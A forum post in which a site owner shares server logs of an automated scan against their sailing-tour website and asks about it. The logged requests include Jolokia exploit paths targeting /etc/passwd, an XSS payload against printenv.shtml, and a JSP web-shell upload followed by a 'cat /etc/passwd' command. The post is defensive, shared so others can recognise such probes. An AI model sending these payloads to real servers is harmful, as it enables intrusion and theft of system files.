Hey everyone,
This is not an urgent matter, more like a curiosity. After going through the logs for last hour, I’ve noticed that someone is actively trying to extract data from our site running URL queries for known vulnerabilities in Apache, and trying to access something called ‘Jolokia’ which I now know is some sort of Java monitoring software. Also trying to exploit an old SSI vulnerability.
Out site can be found at www.citysailing.es
Anyway, these all return a 404 obviously but I thought I’d share it here. The following are the relevant lines form the log.
Jul 20, 08:09:53 AM: e018f2d8 INFO next-translate - compiled page: /404 - locale: es - namespaces: common, tours - used loader: getStaticProps
Jul 20, 08:09:53 AM: e018f2d8 INFO [GET] /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd (SSR)
Jul 20, 08:09:53 AM: e018f2d8 Duration: 53.32 ms Memory Usage: 179 MB
Jul 20, 08:09:57 AM: e9b8a10f INFO next-translate - compiled page: /404 - locale: es - namespaces: common, tours - used loader: getStaticProps
Jul 20, 08:09:57 AM: e9b8a10f INFO [GET] /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd (SSR)
Jul 20, 08:09:57 AM: e9b8a10f Duration: 46.67 ms Memory Usage: 180 MB
Jul 20, 08:10:01 AM: 3b820aa1 INFO next-translate - compiled page: /[tour] - locale: es - namespaces: common, tours - used loader: getServerSideProps
Jul 20, 08:10:01 AM: 3b820aa1 INFO next-translate - compiled page: /404 - locale: es - namespaces: common, tours - used loader: getStaticProps
Jul 20, 08:10:01 AM: 3b820aa1 INFO [GET] /jkstatus (SSR)Jul 20, 08:10:01 AM: 3b820aa1 Duration: 164.62 ms Memory Usage: 181 MB
Jul 20, 08:10:03 AM: 5ac67284 INFO next-translate - compiled page: /404 - locale: es - namespaces: common, tours - used loader: getStaticProps
Jul 20, 08:10:03 AM: 5ac67284 INFO [GET] /jolokia/list (SSR)Jul 20, 08:10:03 AM: 5ac67284 Duration: 133.35 ms Memory Usage: 181 MB
Jul 20, 08:10:05 AM: 09fbfe72 INFO next-translate - compiled page: /[tour] - locale: es - namespaces: common, tours - used loader: getServerSideProps
Jul 20, 08:10:05 AM: 09fbfe72 INFO next-translate - compiled page: /404 - locale: es - namespaces: common, tours - used loader: getStaticProps
Jul 20, 08:10:05 AM: 09fbfe72 INFO [GET] /jkstatus (SSR)Jul 20, 08:10:05 AM: 09fbfe72 Duration: 200.52 ms Memory Usage: 182 MB
Jul 20, 08:10:06 AM: c16acfed INFO next-translate - compiled page: /404 - locale: es - namespaces: common, tours - used loader: getStaticProps
Jul 20, 08:10:06 AM: c16acfed INFO [GET] /actuator/jolokia/list (SSR)Jul 20, 08:10:06 AM: c16acfed Duration: 59.82 ms Memory Usage: 182 MB
Jul 20, 08:10:35 AM: 5c127ee1 INFO next-translate - compiled page: /[tour] - locale: es - namespaces: common, tours - used loader: getServerSideProps
Jul 20, 08:10:35 AM: 5c127ee1 INFO next-translate - compiled page: /404 - locale: es - namespaces: common, tours - used loader: getStaticProps
Jul 20, 08:10:35 AM: 5c127ee1 INFO [GET] /printenv.shtml?%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E= (SSR)
Jul 20, 08:10:35 AM: 5c127ee1 Duration: 217.76 ms Memory Usage: 182 MB
Jul 20, 08:10:39 AM: b6bdd3d4 INFO next-translate - compiled page: /404 - locale: es - namespaces: common, tours - used loader: getStaticProps
Jul 20, 08:10:39 AM: b6bdd3d4 INFO [GET] /ssi/printenv.shtml?%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E= (SSR)
Jul 20, 08:10:39 AM: b6bdd3d4 Duration: 70.98 ms Memory Usage: 183 MB
Jul 20, 08:15:16 AM: dad1fe2f INFO [PUT] /poc.jsp/ (SSR)Jul 20, 08:15:16 AM: dad1fe2f Duration: 3.87 ms Memory Usage: 183 MB
Jul 20, 08:15:17 AM: 20942261 INFO [PUT] /poc.jsp/ (SSR)
Jul 20, 08:15:17 AM: 20942261 Duration: 4.23 ms Memory Usage: 183 MB
Jul 20, 08:15:18 AM: 54bcf45f INFO next-translate - compiled page: /[tour] - locale: es - namespaces: common, tours - used loader: getServerSideProps
Jul 20, 08:15:18 AM: 54bcf45f INFO next-translate - compiled page: /404 - locale: es - namespaces: common, tours - used loader: getStaticProps
Jul 20, 08:15:18 AM: 54bcf45f INFO [GET] /poc.jsp?cmd=cat+%2Fetc%2Fpasswd (SSR)Jul 20, 08:15:18 AM: 54bcf45f Duration: 206.33 ms Memory Usage: 183 MB